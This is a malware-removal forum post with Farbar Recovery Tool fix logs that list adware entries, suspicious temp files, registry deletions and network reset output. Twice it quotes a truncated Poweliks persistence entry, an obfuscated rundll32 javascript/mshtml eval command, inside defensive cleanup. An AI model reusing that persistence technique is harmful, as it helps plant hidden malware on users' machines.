2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00015634.tmp
2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00002285.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030578.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030229.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00023977.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020742.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020235.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00010628.tmp
2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00009513.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00030861.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00026229.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00024618.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00015427.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011764.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011583.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011416.tmp
2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00009629.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00024044.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00010878.tmp
2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00004843.tmp
2014-11-21 19:24 - 2014-11-21 19:24 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\UpdaterEX
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00032443.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00029794.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00023882.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00020540.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00016943.tmp
2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00008696.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00032387.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030762.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030524.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030400.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029911.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029532.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029136.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00026392.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00025130.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00024350.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00020723.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018485.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018399.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00016036.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00004936.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00003093.tmp
2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00002479.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00032336.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00026404.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00017573.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00015873.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003273.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003145.tmp
2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003124.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032536.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032139.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00031035.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030934.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030827.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030618.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030117.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00024058.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023025.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023002.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00021308.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00016419.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011739.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011697.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00010722.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00009744.tmp
2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00002782.tmp
2014-11-10 16:28 - 2014-11-10 16:28 - 01176168 ____T () C:\windows\SysWOW64\00010043.tmp
CustomCLSID: HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CMD: ipconfig /flushdns
CMD: netsh winsock reset all
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
EmptyTemp:
end
*****************

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value deleted successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
HKU\S-1-5-21-708974729-55146766-922195683-1000\Software\Microsoft\Internet Explorer\URLSearchHooks\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}" => Key deleted successfully.
HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key deleted successfully.
"HKCR\CLSID\{9C687E47-1977-4703-A481-C8CABB96E47A}" => Key not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key deleted successfully.
"HKCR\CLSID\{A531D99C-5A22-449b-83DA-872725C6D0ED}" => Key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key deleted successfully.
"HKCR\Wow6432Node\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => Key deleted successfully.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{EF99BD32-C1FB-11D2-892F-0090271D4F88} => value deleted successfully.
"HKCR\Wow6432Node\CLSID\{EF99BD32-C1FB-11D2-892F-0090271D4F88}" => Key not found.
C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} not found.
Chrome HomePage deleted successfully.
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdloijijlkoblmigdofommgnheckmaki" => Key deleted successfully.
"C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx" => File/Directory not found.
"C:\Program Files (x86)\Funmoods" => File/Directory not found.
C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59} => Moved successfully.
"C:\windows\SysWOW64\00023117.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015471.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031111.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028728.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026393.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031371.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020726.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020389.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017818.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031411.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029171.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025329.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017058.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014895.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011232.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002098.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032327.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032523.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014946.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010308.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003015.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002113.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023823.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023071.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014825.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010889.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010756.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018636.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009161.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030454.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030447.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028745.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028716.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026816.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026777.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024578.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023986.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023973.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016512.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015573.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015155.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00005021.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002866.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031673.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030319.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024078.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023996.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010089.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009930.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002306.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031115.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029658.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025608.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024626.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023762.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00022929.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00021311.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016541.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016118.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014977.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014643.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012646.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010697.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002161.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002082.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032439.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031960.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031865.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026308.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025184.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023329.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016944.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011840.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00004966.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002237.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031322.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023811.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031705.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030925.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030333.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029577.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029464.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028973.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026798.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025951.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025547.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025444.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024393.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024370.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024084.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023805.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023491.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020799.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017673.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017555.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016571.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015890.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015350.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015141.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015006.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014883.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014818.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012859.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012623.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010496.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010309.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010053.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009413.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003548.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015984.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026299.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017035.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011277.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009894.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025667.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017619.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015674.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009558.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029666.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020219.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032474.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032274.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031833.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031762.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030039.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00028825.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020776.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020697.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020695.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017098.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016156.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016039.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016021.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015665.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015633.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011924.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008712.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003225.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030809.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030106.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024466.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023278.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015279.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009040.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008942.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00001842.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030623.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018317.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012316.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003035.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032391.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029358.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025850.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024464.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023281.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00021293.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017421.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015724.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00014771.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012382.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00012296.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011942.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011811.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011478.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009741.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008723.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002995.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00001869.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026500.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018266.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016034.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015634.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002285.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030578.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030229.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023977.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020742.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020235.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010628.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009513.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030861.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026229.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024618.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015427.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011764.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011583.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011416.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009629.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024044.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010878.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00004843.tmp" => File/Directory not found.
C:\Users\Owner\AppData\Roaming\UpdaterEX => Moved successfully.
"C:\windows\SysWOW64\00032443.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029794.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023882.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020540.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016943.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00008696.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032387.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030762.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030524.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030400.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029911.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029532.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00029136.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026392.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00025130.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024350.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00020723.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018485.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00018399.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016036.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00004936.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003093.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002479.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032336.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00026404.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00017573.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00015873.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003273.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003145.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00003124.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032536.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00032139.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00031035.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030934.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030827.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030618.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00030117.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00024058.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023025.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00023002.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00021308.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00016419.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011739.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00011697.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010722.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00009744.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00002782.tmp" => File/Directory not found.
"C:\windows\SysWOW64\00010043.tmp" => File/Directory not found.
"HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

=========  ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

=========  netsh winsock reset all =========

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.

========= End of CMD: =========

=========  netsh int ipv4 reset =========

Reseting Global, OK!
Reseting Interface, OK!
Reseting Unicast Address, OK!
Reseting Route, OK!
Restart the computer to complete this action.

========= End of CMD: =========

=========  netsh int ipv6 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========



#9 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 02 December 2014 - 09:15 PM

FarBar Run #2.  It looks like after it completed, all the way this time, it removed the fixlist.txt that had been on my desktop.

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-12-2014
Ran by Owner at 2014-12-02 21:04:24 Run:2
Running from C:\Users\Owner\Desktop
Loaded Profile: Owner (Available profiles: Owner)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-708974729-55146766-922195683-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
URLSearchHook: HKU\S-1-5-21-708974729-55146766-922195683-1000 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> DefaultScope {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {A531D99C-5A22-449b-83DA-872725C6D0ED} URL = http://search.alot.c...on=1.1.3001.0(B)
BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
CHR HomePage: Default -> hxxp://start.funmoods.com/?f=1&a=axl
CHR HKLM-x32\...\Chrome\Extension: [fdloijijlkoblmigdofommgnheckmaki] - C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx [2014-10-04]
C:\Program Files (x86)\Funmoods
2014-11-30 15:17 - 2014-11-30 15:17 - 00000000 ____D () C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}
2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00023117.tmp
2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00015471.tmp
2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00031111.tmp
2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00028728.tmp
